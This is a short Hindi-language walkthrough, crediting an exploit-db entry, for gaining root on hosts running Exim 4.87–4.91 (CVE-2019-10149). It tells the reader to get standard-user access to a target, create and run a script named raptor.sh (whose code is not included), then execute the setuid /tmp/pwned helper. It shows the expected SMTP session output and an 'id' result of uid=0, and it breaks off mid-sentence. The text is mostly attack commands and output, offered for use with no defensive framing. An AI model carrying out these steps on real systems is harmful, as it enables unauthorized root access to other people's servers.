
स्थानीय विशेषाधिकार वृद्धि शोषण Exim 4.87-4.91 (CVE-2019-10149) के लिए। निर्मित SMTP कमांड के माध्यम से एक setuid रूट शेल हेल्पर प्रदान करता है, जो सामान्य उपयोगकर्ता से रूट तक विशेषाधिकार वृद्धि को सक्षम बनाता है।
Cr.Exim 4.87 - 4.91 - स्थानीय विशेषाधिकार वृद्धि
Cr.Link: https://www.exploit-db.com/exploits/46996
#1.इस विधि के लिए आपको पहले लक्ष्य मशीन तक मानक उपयोगकर्ता विशेषाधिकारों के साथ पहुंच प्राप्त करनी होगी।
#2.एक बार जब आप लक्ष्य मशीन तक पहुंच प्राप्त कर लें, तो निम्नलिखित सामग्री के साथ एक स्क्रिप्ट फ़ाइल बनाएँ:
vi raptor.sh
#3.प्रदान की गई 'raptor.sh' फ़ाइल से कोड कॉपी करें। फिर, फ़ाइल को निम्नलिखित कमांड का उपयोग करके निष्पादित करें:
chmod +x raptor.sh
./raptor.sh
#4.आपको नीचे दिए गए उदाहरण के समान आउटपुट प्राप्त होना चाहिए:
Preparing setuid shell helper...
Delivering payload...
220 machine-noob
ESMTP Exim 4.89 Wed, 03 Dec 2025 08:29:29 +0000
250 machine-noob
Hello localhost [127.0.0.1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1vQiEr-00001R-7t
221 machine-noob
closing connection
Waiting 5 seconds for Exim to execute payload...
-rwsr-xr-x 1 root noob 8392 Dec 3 08:29 /tmp/pwned
#5.अगला, निम्नलिखित कमांड निष्पादित करें:
/tmp/pwned
#6.फिर, 'id' कमांड चलाने का प्रयास करें। यदि आप निम्नलिखित परिणाम देखते हैं:
uid=0(root) gid=0(root) groups=0(root),1001(noob)